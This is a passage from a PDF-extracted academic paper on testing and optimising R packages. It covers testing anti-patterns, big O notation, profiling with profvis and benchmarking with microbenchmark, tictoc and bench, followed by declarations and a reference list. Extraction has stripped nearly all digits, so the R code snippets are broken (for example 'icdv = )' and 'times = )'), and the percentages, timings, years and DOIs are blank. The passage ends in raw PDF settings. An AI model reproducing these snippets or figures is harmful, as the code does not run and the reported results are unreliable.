diagnosis columns if (!missing(dx_cols)) { # assume columns are referenced by ‘dx_cols’ dxmat <- sapply(dplyr::select( data, !!dplyr::enquo(dx_cols)), as.character) # create empty matrix if necessary if(! is.matrix(dxmat)) { dxmat <- as.matrix(dxmat) } } else { dxmat <- matrix(“”, nrow = nrow(data)) } the new code: if (!missing(dx_cols)) { dxmat <- as.matrix(dplyr::mutate_all( dplyr::select( data, !!dplyr::enquo(dx_cols)), as.character)) } else { dxmat <- matrix(“”, nrow = nrow(data)) } one of the tests written to verify the problem didn’t reoccur: # due to previous use of sapply in ccc.r, this would fail test_that(paste(“ patient with multiple rows of no diagnosis”, “data--should have all cccs as false”), { expect_true(all(ccc(dplyr::data_frame( id = ‘a’, dx = na, dx = na), dx_cols = dplyr::starts_with(“dx”), icdv = code) == )) } ) testing anti-patterns: while the above guidance should help researchers know the basics of testing, it does not cover in detail what not to do. an excellent collection of testing anti-patterns can be found at (moilanen, ; carr, ; stack overflow contributors, ). some key problems that novices experience when learning how to test software are: � interdependent tests—interdependent tests can cause multiple test failures. when a failure in an early test case breaks a later test, it can cause difficulty in resolution and remediation. russell et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ � testing application performance—while testing execution timing or software performance is a good idea and is covered more in the “software optimization” section, creating an automated test to perform this is difficult and does not carry over well from one machine to another. � slow running tests—as much as possible, tests should be automated but still run quickly. if the testing process takes too long consider refactoring tests or evaluating the performance of the software being tested. � only test correct input—a common problem in testing is to only validate expected inputs and desired behavior. make sure tests cover invalid input, exceptions, and similar items. software optimization getting software to run in a reasonable amount of time is always a key consideration when working with large datasets. a mathematical understanding of software algorithms is usually a key component of software engineering curricula, but not widely covered in other disciplines. additionally, while software engineering texts and curricula highlight the importance of testing for non-functional requirements such as performance (sommerville, ), they often fail to provide details on how best to evaluate software performance or how to plan for performance during the various phases of software lifecycle. the survey of r packages at the beginning of this work indicates that approximately % of packages do not use optimization related packages nor compiled code to improve performance. while the survey of r packages is not evidence of non-optimization of packages in cran, computational researchers can should carefully consider performance aspects of their software before declaring it complete. this section will provide a starting point for additional study, research, and experimentation. the python foundation’s python language wiki provides excellent high-level advice (python wiki contributors, ) to follow before spending too much time in optimization: first get the software working correctly, test to see if it is correct, profile the application if it is slow, and lastly optimize based on the results of code profiling. if necessary, repeat multiple cycles of testing, profiling, and optimization phases. the key aspects of software optimization discussed in this are: identify a performance target, understanding and applying big o notation, and the use code profiling and benchmarking tools. key recommendations for identifying and validating performance targets: � identify functional and non-functional requirements of the software being developed. � if software performance is key to the software requirements, develop repeatable tests to evaluate performance. discussion: the first step to software optimization is to understand the functional and non-functional requirements of the software being built. based on expected input, output, and platform the software will be run on, one can make a decision as to what is good enough for the software being developed. a pragmatic approach is best—do not russell et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ spend time optimizing if it does not add value. once the functional requirements have been correctly implemented and validated, a decision point is reached: decide if the software is slow and in need of evaluation and optimization. while this may seem a trivial and unnecessary step, it should not be overlooked; a careful evaluation of costs versus benefit from an optimization effort should be evaluated before moving forward. some methods for gathering the performance target are through an evaluation of other similar software, interdependencies of the software and its interaction with other systems, and discussion with other experts in the field. once a performance target has been identified, development of tests for performance can begin. while performance testing is often considered an anti-pattern of testing (moilanen, ) some repeatable tests should be created to track performance as development progresses. often a “stress test” or a test with greater than expected input/usage is the best way to do this. a good target is to check an order of magnitude larger input than expected. this type of testing can provide valuable insight into the performance characteristics of the software as well unearth potentials for failure due to unexpected load (sommerville, ). here is an example of performance validation testing that can also serve as a basic reproducibility test calling the main function from pccc using the microbenchmark package (one could also use bench, benchr, or other similar r packages). library(pccc) rm(list=ls()) gc() icd _large <- feather::read_feather( “../icd_file_generator/icd _sample_large.feather” ) library(microbenchmark) microbenchmark( ccc(icd _large[ : , c( : )], # get id, dx, and pc columns id = id, dx_cols = dplyr::starts_with(“dx”), pc_cols = dplyr::starts_with(“pc”), icdv = ), times = ) unit: seconds expr min lq mean median uq max neval ccc . . . . . . results are from a system with . ghz intel core i , gb mhz lpddr , pci-express ssd, running macos . . and r version . . ( - - ). russell et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ as software runs can differ significantly from one to the next due to other software running on the test system, a good starting point is to run the same test times (rather than the microbenchmark default of due to this being a longer running process) and record the mean run time. microbenchmark also shows median, lower and upper quartiles, min, and max run times. the actual ccc() call specifics are un-important; the key is to test the main features of your software in a repeatable fashion and watch for performance changes over time. these metrics can help to identify if a test was valid and indicate a need for retesting; that is, a large interquartile range may indicate not enough tests were run or some aspect of environment is causing performance variations. software benchmarking is highly system specific in that changing os version, r version, r dependent package version, compiler version (if compiled code involved), or hardware may change the results. as long as all tests are run the same on the same system with the same software, one can compare timings as development progresses. lastly, although the example above is focused on runtime, it can be beneficial to also identify targets for disk space used and memory required to complete all desired tasks. as an example, tools such as bench and profvis demonstrated in our “code profiling/benchmarking” section as well as object.size() from core r can give developers insight into memory allocation and usage. there are many resources beyond this work that can provide guidance on how to minimize ram and disk resources (kane, emerson & weston, ; wickham, b; wickham et al., ; klik, collet & facebook, ). key recommendations for identifying upper bound on performance: � big o notation allows the comparison of theoretical performance of different algorithms. � evaluate how many times blocks of code will run as input approaches infinity. � loops inside loops are very slow as input approaches infinity. discussion: big o notation is a method for mathematically determining the upper bound on performance of a block of code without consideration for language and hardware specifics. although performance can be evaluated in terms of storage or run time, most examples and comparisons focus on run time. however, when working with large datasets, memory usage and disk usage can be of equal or higher importance than run. big o notation is reported in terms of input (usually denoted as n) and allows one to quickly compare theoretical performance of different algorithms. the basic steps for evaluating the upper bound of performance of a block of software code is to evaluate what code will run as n approaches infinity. items that are constant time (regardless of if they run once or x times independent of input) are reduced down to o( ). the key factors that contribute to big o are loops—a single for loop or similar construct through recursion that runs once for all n is o(n); a nested for loop would be o(n ). when calculating big o for a code block, function, or software system, lower order terms are ignored, and just the largest big o notation is used; for example, if a code block is o( ) + o(n) + o(n ) it would be denoted as o(n ). russell et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ despite the value of understanding the theoretical upper bound of software in an ideal situation, there are many difficulties that arise during implementation that can make big o difficult to calculate and which could make a large big o faster than a small big o under actual input conditions. some key takeaways to temper a mathematical evaluation of big o are: � constants matter when choosing an algorithm—for example, if one algorithm is o( n ), there exists some n where o(n ) is faster. � average or best case run time might be more relevant. � big o evaluation of algorithms in high level languages is often hard to quantify. for additional details on big o notation, see the excellent and broadly understandable introduction to big o notation (abrahms, ). key recommendations for profiling and benchmarking: � profile code to find bottlenecks. � modify code to address largest items from profiling. � run tests to make sure functionality isn’t affected. � repeat process if gains are made and additional performance improvements are necessary. discussion: as discussed throughout this section, optimization is a key aspect of software development, especially with respect to large datasets. although identification of performance targets and a mathematical analysis of algorithms are important steps, the final result must be tested and verified. the only way to know if your software will perform adequately under ideal (and non-ideal) circumstances is to use benchmarking and code profiling tools. code profilers show how a software behaves and what functions are being called while benchmarking tools generally focus on just execution time—though some tools combine both profiling and benchmarking. in r, some of the common tools are bench, benchr, microbenchmark, tictoc, rprof (r core team, ), proftools (tierney & jarjour, ), and profvis. if, after implementation has been completed, the software functions correctly, and performance targets have not been met, look to optimize your code. follow an iterative process of profiling to find bottlenecks, making software adjustments, testing small sections with benchmarking and then repeating the process with overall profiling again. if at any point in the process you discover that due to input size, functional requirements, hardware limitations, or software dependencies you cannot make a significant impact to performance, consider stopping further optimization efforts (burns, ). as with software testing and software bugs, the pareto principle applies, though some put the balance between code and execution time is closer to % of time is in % of the code or even as high as % in % (xochellis, ; bird, ). identify the biggest bottlenecks via code profiling and focus only on the top issues first. as an example of how to perform code profiling and benchmarking in r, do the following: russell et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ first, use profvis to identify the location with the largest execution time: library(pccc) icd _large <- feather::read_feather(“icd _sample_large.feather”) profvis::profvis({ccc(icd _large[ : ,], id = id, dx_cols = dplyr::starts_with(“dx”), pc_cols = dplyr::starts_with(“pc”), icdv = )}, torture = ) in fig. you can see a visual depiction of memory allocation, known as a “flame graph,” as well as execution time and call stack. by clicking on each item in the stack you will be taken directly to the relevant source code and can see which portions of the code take the most time or memory allocations. figure is a depiction of the data view which shows just the memory changes, execution time, and source file. once the bottleneck has been identified, if possible extract that code to a single function or line that can be run repeatedly with a library such as microbenchmark or tictoc to see if a small change either improves or degrades performance. test frequently and make sure to compare against previous versions. you may find that something you thought would improve performance degrades performance. as a first step we recommend running tictoc to get general timings such as the following: library(tictoc) tic(“timing: r version”) out <- dplyr::bind_cols(ids, ccc_mat_r(dxmat, pcmat, icdv)) toc() figure profvis flame graph. visual depiction of memory allocation/deallocation, execution time, and call stack. full-size doi: . /peerj-cs. /fig- russell et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ tic(“timing: c++ version”) dplyr::bind_cols(ids, ccc_mat_rcpp(dxmat, pcmat, icdv)) toc() timing: r version: . sec elapsed timing: c++ version: . sec elapsed as with previous timings, while we’re showing pccc calls, any custom function of block of code you have can be compared against an alternative version to see which performs better. the above blocks of code call the core functionality of the pccc package—one implemented all in r, the other with c++ for the matrix processing and string matching components; see sourcecode available at https://github.com/magic-lantern/pccc/ blob/no_cpp/r/ccc.r for full listing. after starting with high level timings, next run benchmarks on specific sections of code such as in this example comparing importing a package vs using the package reference operator using bench: library(bench) set.seed( ) bench::mark( package_ref <- lapply(medium_input, function(i) { if(any(stringi::stri_startswith_fixed(i, ‘s’),na.rm = true)) return( l) else return( l) })) # a tibble: � expression min mean median max �itr/sec� mem_alloc <chr> <bch> <bch> <bch:> <bch> <dbl> <bch:byt> package_r : : : ms ms ms ms . . mb library(stringi) bench::mark( direct_ref <- lapply(medium_input, function(i) { if(any(stri_startswith_fixed(i, ‘s’),na.rm = true)) return( l) else return( l) })) # a tibble: � expression min mean median max �itr/sec� mem_alloc <chr> <bch> <bch> <bch:> <bch> <dbl> <bch:byt> direct_re : : : ms ms ms ms . . mb the above test was run on a virtual machine running ubuntu . . lts using r . . . russell et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/magic-lantern/pccc/blob/no_cpp/r/ccc.r https://github.com/magic-lantern/pccc/blob/no_cpp/r/ccc.r http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ one benefit of bench::mark over microbenchmark is that bench reports memory allocations as well as timings, similar to data shown in profvis. through benchmarking we found that for some systems/configurations the use of the “::” operator, as opposed to importing a package, worsened performance noticeably. also widely known (gillespie & lovelace, ) and found to be applicable here is that the use of matrices are preferred for performance reasons over data.frames or tibbles. matrices do have different functionality, which can require some re-work when converting from one to another. for example, a matrix can only contain data type such as character or numeric; figure profvis data chart. table view of memory allocation/deallocation, execution time, and call stack. full-size doi: . /peerj-cs. /fig- figure profvis flame graph .call(). visual depiction of memory allocation/deallocation, execution time, and call stack; note the limitations in detail at the .call() function where custom compiled code is called. full-size doi: . /peerj-cs. /fig- russell et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ data.frames and tibbles support shortcut notations such as mydf$colname. another key point found is that an “env” with no parent environment is significantly faster (up to x) than one with a parent env. in the end, optimization efforts resulted in reducing run time by %. one limitation with r profiling tools is that if the code to be profiled executes c++ code, you will get no visibility into what is happening once the switch from r to c++ has occurred. as shown in fig. , visibility into timing and memory allocation stops at the . call() function. in order to profile c++ code, you need to use non-r specific tools such as xcode on macos or gprof on non-macos unix-based operating system (os). see “r_with_c++_profiling.md” in our source code repository for some guidance on this topic. some general lessons learned from profiling and benchmarking: � “beware the dangers of premature optimization of your code. your first duty is to create clear, correct code.” (knuth, ; burns, ) never optimize before you actually know what is taking all the time/memory/space with your software. different compilers and core language updates often will change or reverse what experience has previously indicated as sources of slowness. always benchmark and profile before making a change. � start development with a high-level programming language first—developer/ researcher time is more valuable than cpu/gpu time. choose the language that allows the developer/researcher to rapidly implement the desired functionality rather than selecting a language/framework based on artificial benchmarks (kelleher & pausch, ; jones & bonsignour, ). � software timing is highly os, compiler, and system configuration specific. what improves results greatly on one machine and configuration may actually slow performance on another machine. once you decided to put effort into optimization, make sure you test on a range of realistic configurations before deciding that an “improvement” is beneficial (hyde, ). � if you’ve exhausted your options with your chosen high-level language, c++ is usually the best option for further optimization. for an excellent introduction to combining c++ with r via the library rcpp, see (eddelbuettel & balamuta, ). for some additional information on r optimization, see (wickham, b; robinson, ). conclusion researchers frequently develop software to automate tasks and speed the pace of research. unfortunately, researchers are rarely trained in software engineering principles necessary to develop robust, validated, and performant software. software maintenance is an often overlooked and underestimated aspect in the lifecycle of any software product. software engineering principles and tooling place special focus on the processes around designing, building, and maintaining software. in this paper, the key topics of software testing and software optimization have been discussed along with some analysis russell et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ of existing software packages in the r language. our analysis showed that the majority of r packages have neither unit testing nor evidence of optimization available with normally distributed source code. through self-education on unit testing and optimization, any computational or other researcher can pick up the key principles of software engineering that will enable them to spend less time troubleshooting software and more time doing the research they enjoy. additional information and declarations funding the university of colorado data science to patient value initiative provided funding for this work. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosure the following grant information was disclosed by the authors: university of colorado data science to patient value. competing interests the authors declare that they have no competing interests. author contributions � seth russell conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � tellen d. bennett conceived and designed the experiments, authored or reviewed drafts of the paper, approved the final draft. � debashis ghosh conceived and designed the experiments, authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: source code, images, generated data for r package analysis are available at: https://github.com/magic-lantern/softwareengineeringprinciples. materials from paper including figures, references, and text are available at: https://github.com/magic-lantern/softwareengineeringprinciples/tree/master/paper. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references abrahms j. . big-o notation explained by a self-taught programmer. available at https://justin.abrah.ms/computer-science/big-o-notation-explained.html. russell et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/magic-lantern/softwareengineeringprinciples https://github.com/magic-lantern/softwareengineeringprinciples/tree/master/paper http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information https://justin.abrah.ms/computer-science/big-o-notation-explained.html http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ agruss c, johnson b. . ad hoc software testing. viitattu : . allaire jj, francois r, ushey k, vandenbrouck g, library mg (tinythread, http://tinythreadpp. bitsnbites.eu/), rstudio, library i (intel t, https://www.threadingbuildingblocks.org/), microsoft. a. rcppparallel: parallel programming tools for “rcpp”. available at https://cran. r-project.org/package=rcppparallel. allaire jj, xie y, mcpherson j, luraschi j, ushey k, atkins a, wickham h, cheng j, chang w, iannone r. b. rmarkdown: dynamic documents for r. available at https://rmarkdown. rstudio.com. apache software foundation. . sparkr (r on spark) - spark . . documentation. available at https://spark.apache.org/docs/latest/sparkr.html. atchison wf, conte sd, hamblen jw, hull te, keenan ta, kehl wb, mccluskey ej, navarro so, rheinboldt wc, schweppe ej, viavant w, young dm jr. . curriculum : recommendations for academic programs in computer science: a report of the acm curriculum committee on computer science. communications of the acm ( ): – doi . / . . beck k, beedle m, van bennekum a, cockburn a, cunningham w, fowler m, grenning j, highsmith j, hunt a, jeffries r, kern j, marick b, martin rc, mellor s, schwaber k, sutherland j, thomas d. . manifesto for agile software development. available at http://agilemanifesto.org/. beck k, gamma e. . test infected: programmers love writing tests. java report : – . available at http://members.pingnet.ch/gamma/junit.htm. bengtsson h. . future: unified parallel and distributed processing in r for everyone. available at https://cran.r-project.org/package=future. bengtsson h, r core team. . future.apply: apply function to elements in parallel using futures. available at https://cran.r-project.org/package=future.apply. bird j. . applying the : rule in software development - dzone agile. available at https://dzone.com/articles/applying- -rule-software. bischl b, lang m. . parallelmap: unified interface to parallelization back-ends. available at https://cran.r-project.org/package=parallelmap. bischl b, lang m, mersmann o, rahnenführer j, weihs c. . batchjobs and batchexperiments: abstraction mechanisms for using r in batch environments. journal of statistical software : – . burger m, juenemann k, koenig t. . runit: r unit test framework. available at https:// cran.r-project.org/package=runit. burns p. . the r inferno. available at https://lulu.com. calaway r, analytics r, weston s. . domc: foreach parallel adaptor for “parallel.” available at https://cran.r-project.org/package=domc. calaway r, corporation m, weston s. . dosnow: foreach parallel adaptor for the “snow” package. available at https://cran.r-project.org/package=dosnow. calaway r, corporation m, weston s, tenenbaum d. . doparallel: foreach parallel adaptor for the “parallel” package. available at https://cran.r-project.org/package=doparallel. calaway r, microsoft, weston s. . foreach: provides foreach looping construct for r. available at https://cran.r-project.org/package=foreach. carr j. . tdd anti-patterns. available at https://web.archive.org/web/ /http:// blog.james-carr.org: / / / /tdd-anti-patterns/. russell et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://cran.r-project.org/package=rcppparallel https://cran.r-project.org/package=rcppparallel https://rmarkdown.rstudio.com https://rmarkdown.rstudio.com https://spark.apache.org/docs/latest/sparkr.html http://dx.doi.org/ . / . http://agilemanifesto.org/ http://members.pingnet.ch/gamma/junit.htm https://cran.r-project.org/package=future https://cran.r-project.org/package=future.apply https://dzone.com/articles/applying- -rule-software https://cran.r-project.org/package=parallelmap https://cran.r-project.org/package=runit https://cran.r-project.org/package=runit https://lulu.com https://cran.r-project.org/package=domc https://cran.r-project.org/package=dosnow https://cran.r-project.org/package=doparallel https://cran.r-project.org/package=foreach https://web.archive.org/web/ /http://blog.james-carr.org: / / / /tdd-anti-patterns/ https://web.archive.org/web/ /http://blog.james-carr.org: / / / /tdd-anti-patterns/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ chang w, luraschi j. . profvis: interactive visualizations for profiling r code. available at https://cran.r-project.org/package=profvis. dehaghani smh, hajrahimi n. . which factors affect software projects maintenance cost more? acta informatica medica ( ): – doi . /aim. . . - . dewitt p, bennett t, feinstein j, russell s. . pccc: pediatric complex chronic conditions. available at https://cran.r-project.org/package=pccc. dragulescu aa, arendt c. . xlsx: read, write, format excel and excel / /xp/ files. available at https://cran.r-project.org/package=xlsx. eckert a. . paralleldist: parallel distance matrix computation using multiple threads. available at https://cran.r-project.org/package=paralleldist. eddelbuettel d, balamuta jj. . extending r with c++: a brief introduction to rcpp. peerj :e v doi . /peerj.preprints. v . feinerer i, theussl s, buchta c. . dsl: distributed storage and list. available at https://cran. r-project.org/package=dsl. feinstein ja, russell s, dewitt pe, feudtner c, dai d, bennett td. . r package for pediatric complex chronic condition classification. jama pediatrics ( ): doi . /jamapediatrics. . . feudtner c, christakis da, connell fa. . pediatric deaths attributable to complex chronic conditions: a population-based study of washington state, – . pediatrics : – . feudtner c, feinstein ja, zhong w, hall m, dai d. . pediatric complex chronic conditions classification system version : updated for icd- and complex medical technology dependence and transplantation. bmc pediatrics ( ): doi . / - - - . fucci d, scanniello g, romano s, shepperd m, sigweni b, uyaguari f, turhan b, juristo n, oivo m. . an external replication on the effects of test-driven development using a multi-site blind analysis approach. in: proceedings of the th acm/ieee international symposium on empirical software engineering and measurement. esem ‘ , vol. . new york: acm, – , . gaslam b. . unitizer: interactive r unit tests. available at https://cran.r-project.org/ package=unitizer. gillespie c, lovelace r. . efficient r programming: a practical guide to smarter programming. sebastopol: o’reilly media. glass rl. . frequently forgotten fundamental facts about software engineering. ieee software ( ): – doi . /ms. . . grosjean p. . sciviews-r: a gui api for r. mons: umons. hansson dh. . tdd is dead. long live testing. (dhh). available at http://david.heinemeierhansson.com/ /tdd-is-dead-long-live-testing.html. hester j. . bench: high precision timing of r expressions. available at https://cran.r-project.org/ package=bench. hyde r. . the fallacy of premature optimization. ubiquity : doi . / . . izrailev s. . tictoc: functions for timing r scripts, as well as implementations of stack and list structures. available at https://cran.r-project.org/package=tictoc. jones c, bonsignour o. . the economics of software quality. upper saddle river: addison- wesley professional. kane m, emerson j, weston s. . scalable strategies for computing with massive data. journal of statistical software ( ): – doi . /jss.v .i . russell et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://cran.r-project.org/package=profvis http://dx.doi.org/ . /aim. . . - https://cran.r-project.org/package=pccc https://cran.r-project.org/package=xlsx https://cran.r-project.org/package=paralleldist http://dx.doi.org/ . /peerj.preprints. v https://cran.r-project.org/package=dsl https://cran.r-project.org/package=dsl http://dx.doi.org/ . /jamapediatrics. . http://dx.doi.org/ . / - - - https://cran.r-project.org/package=unitizer https://cran.r-project.org/package=unitizer http://dx.doi.org/ . /ms. . http://david.heinemeierhansson.com/ /tdd-is-dead-long-live-testing.html https://cran.r-project.org/package=bench https://cran.r-project.org/package=bench http://dx.doi.org/ . / . https://cran.r-project.org/package=tictoc http://dx.doi.org/ . /jss.v .i http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ kanewala u, bieman jm. . testing scientific software: a systematic literature review. information and software technology ( ): – doi . /j.infsof. . . . kelleher c, pausch r. . lowering the barriers to programming: a taxonomy of programming environments and languages for novice programmers. acm computing surveys ( ): – doi . / . . klevtsov a, antonov a, upravitelev p. . benchr: high precise measurement of r expressions execution time. available at https://cran.r-project.org/package=benchr. klik m, collet y, facebook. . fst: lightning fast serialization of data frames for r. available at https://cran.r-project.org/package=fst. knuth de. . structured programming with go to statements. acm computing surveys ( ): – doi . / . . koskinen j. . software maintenance costs. available at https://wiki.uef.fi/download/ attachments/ /smcosts.pdf. kusnierczyk w, eddelbuettel d, hasselman b. . rbenchmark: benchmarking routine for r. available at https://cran.r-project.org/package=rbenchmark. leek jt, peng rd. . opinion: reproducible research can still be wrong: adopting a prevention approach. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . lentin j, hennessey a. . unittest: tap-compliant unit testing. available at https://cran.r- project.org/package=unittest. luraschi j, kuo k, ushey k, allaire jj, macedo s, rstudio, foundation tas. . sparklyr: r interface to apache spark. available at https://cran.r-project.org/package=sparklyr. matloff n. . software alchemy: turning complex statistical computations into embarrassingly-parallel ones. journal of statistical software ( ): – doi . /jss.v .i . mersmann o. . microbenchmark: accurate timing functions. available at https://cran.r- project.org/package=microbenchmark. micro focus. . unified functional testing. available at https://software.microfocus.com/en-us/ products/unified-functional-automated-testing/overview (accessed april ). moilanen j. . test driven development details. available at https://github.com/educloudalliance/ educloud-development/wiki/test-driven-development-details (accessed april ). nolan r, padilla-parra s. . exampletestr—an easy start to unit testing r packages. wellcome open research : doi . /wellcomeopenres. . . nutter b, lane s. . redcapapi: accessing data from redcap projects using the api. zenodo. doi . /zenodo. . osborne jm, bernabeu mo, bruna m, calderhead b, cooper j, dalchau n, dunn s-j, fletcher ag, freeman r, groen d, knapp b, mcinerny gj, mirams gr, pitt-francis j, sengupta b, wright dw, yates ca, gavaghan dj, emmott s, deane c. . ten simple rules for effective computational research. plos computational biology ( ):e doi . /journal.pcbi. . prins p, de ligt j, tarasov a, jansen rc, cuppen e, bourne pe. . toward effective software solutions for big biology. nature biotechnology ( ): – doi . /nbt. . python wiki contributors. . performance tips. available at https://wiki.python.org/moin/ pythonspeed/performancetips (accessed april ). russell et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.infsof. . . http://dx.doi.org/ . / . https://cran.r-project.org/package=benchr https://cran.r-project.org/package=fst http://dx.doi.org/ . / . https://wiki.uef.fi/download/attachments/ /smcosts.pdf https://wiki.uef.fi/download/attachments/ /smcosts.pdf https://cran.r-project.org/package=rbenchmark http://dx.doi.org/ . /pnas. https://cran.r-project.org/package=unittest https://cran.r-project.org/package=unittest https://cran.r-project.org/package=sparklyr http://dx.doi.org/ . /jss.v .i https://cran.r-project.org/package=microbenchmark https://cran.r-project.org/package=microbenchmark https://software.microfocus.com/en-us/products/unified-functional-automated-testing/overview https://software.microfocus.com/en-us/products/unified-functional-automated-testing/overview https://github.com/educloudalliance/educloud-development/wiki/test-driven-development-details https://github.com/educloudalliance/educloud-development/wiki/test-driven-development-details http://dx.doi.org/ . /wellcomeopenres. . http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /journal.pcbi. http://dx.doi.org/ . /nbt. https://wiki.python.org/moin/pythonspeed/performancetips https://wiki.python.org/moin/pythonspeed/performancetips http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ r core team. . r: a language and environment for statistical computing. vienna: r foundation for statistical computing. available at http://www.r-project.org/. ranorex gmbh. . ranorex. available at https://www.ranorex.com (accessed april ). reese j. . best practices for writing unit tests. available at https://docs.microsoft.com/en-us/ dotnet/core/testing/unit-testing-best-practices. robinson e. . making r code faster : a case study. available at https://robinsones.github.io/ making-r-code-faster-a-case-study/. rooney p. . microsoft’s ceo: - rule applies to bugs, not just features. available at http://www.crn.com/news/security/ /microsofts-ceo- - -rule-applies-to-bugs-not-just- features.htm. sandve gk, nekrutenko a, taylor j, hovig e. . ten simple rules for reproducible computational research. plos computational biology ( ):e doi . /journal.pcbi. . selenium contributors. . selenium. available at https://www.seleniumhq.org (accessed april ). sommerville i. . software engineering. boston: pearson. sommerville i. . giving up on test-first development. available at http://iansommerville.com/ systems-software-and-technology/giving-up-on-test-first-development/. stack overflow contributors. . unit testing anti-patterns catalogue. available at https://stackoverflow.com/questions/ /unit-testing-anti-patterns-catalogue (accessed april ). the joint task force on computing curricula. . curriculum guidelines for undergraduate degree programs in software engineering. new york: acm. tierney l, jarjour r. . proftools: profile output processing tools for r. available at https:// cran.r-project.org/package=proftools. tierney l, rossini aj, li n, sevcikova h. . snow: simple network of workstations. available at https://cran.r-project.org/package=snow. weston s. . dompi: foreach parallel adaptor for the rmpi package. available at https://cran. r-project.org/package=dompi. wickham h. . testthat: get started with testing. r journal : – . wickham h. a. profr: an alternative display for profiling information. available at https:// cran.r-project.org/package=profr. wickham h. b. advanced r. boca raton: chapman and hall/crc. wickham h, rstudio, feather developers, google, leveldb authors. . feather: r bindings to the feather “api”. available at https://cran.r-project.org/package=feather. wikipedia contributors. a. sunit — wikipedia, the free encyclopedia. available at https://en.wikipedia.org/w/index.php?title=sunit&oldid= . wikipedia contributors. b. xunit — wikipedia, the free encyclopedia. available at https://en.wikipedia.org/w/index.php?title=xunit&oldid= . wilson g. . software carpentry: lessons learned. f research : doi . /f research. - .v . wilson g, aruliah da, brown ct, hong npc, davis m, guy rt, haddock shd, huff kd, mitchell im, plumbley md, waugh b, white ep, wilson p. . best practices for scientific computing. plos biology ( ):e doi . /journal.pbio. . russell et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://www.r-project.org/ https://www.ranorex.com https://docs.microsoft.com/en-us/dotnet/core/testing/unit-testing-best-practices https://docs.microsoft.com/en-us/dotnet/core/testing/unit-testing-best-practices https://robinsones.github.io/making-r-code-faster-a-case-study/ https://robinsones.github.io/making-r-code-faster-a-case-study/ http://www.crn.com/news/security/ /microsofts-ceo- - -rule-applies-to-bugs-not-just-features.htm http://www.crn.com/news/security/ /microsofts-ceo- - -rule-applies-to-bugs-not-just-features.htm http://dx.doi.org/ . /journal.pcbi. https://www.seleniumhq.org http://iansommerville.com/systems-software-and-technology/giving-up-on-test-first-development/ http://iansommerville.com/systems-software-and-technology/giving-up-on-test-first-development/ https://stackoverflow.com/questions/ /unit-testing-anti-patterns-catalogue https://cran.r-project.org/package=proftools https://cran.r-project.org/package=proftools https://cran.r-project.org/package=snow https://cran.r-project.org/package=dompi https://cran.r-project.org/package=dompi https://cran.r-project.org/package=profr https://cran.r-project.org/package=profr https://cran.r-project.org/package=feather https://en.wikipedia.org/w/index.php?title=sunit&oldid= https://en.wikipedia.org/w/index.php?title=xunit&oldid= http://dx.doi.org/ . /f research. - .v http://dx.doi.org/ . /journal.pbio. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ xie y. . testit: a simple package for testing r packages. available at https://cran.r-project.org/ package=testit. xie y, allaire jj, grolemund g. . r markdown: the definitive guide. boca raton: chapman and hall/crc. xochellis j. . the impact of the pareto principle in optimization - codeproject. available at https://www.codeproject.com/articles/ /the-impact-of-the-pareto-principle- in-optimization. yu h. . rmpi: parallel statistical computing in r. r news : – . russell et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://cran.r-project.org/package=testit https://cran.r-project.org/package=testit https://www.codeproject.com/articles/ /the-impact-of-the-pareto-principle-in-optimization https://www.codeproject.com/articles/ /the-impact-of-the-pareto-principle-in-optimization http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ software engineering principles to improve quality and performance of r software introduction analysis of r packages on cran recommendations to improve quality and performance conclusion references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo 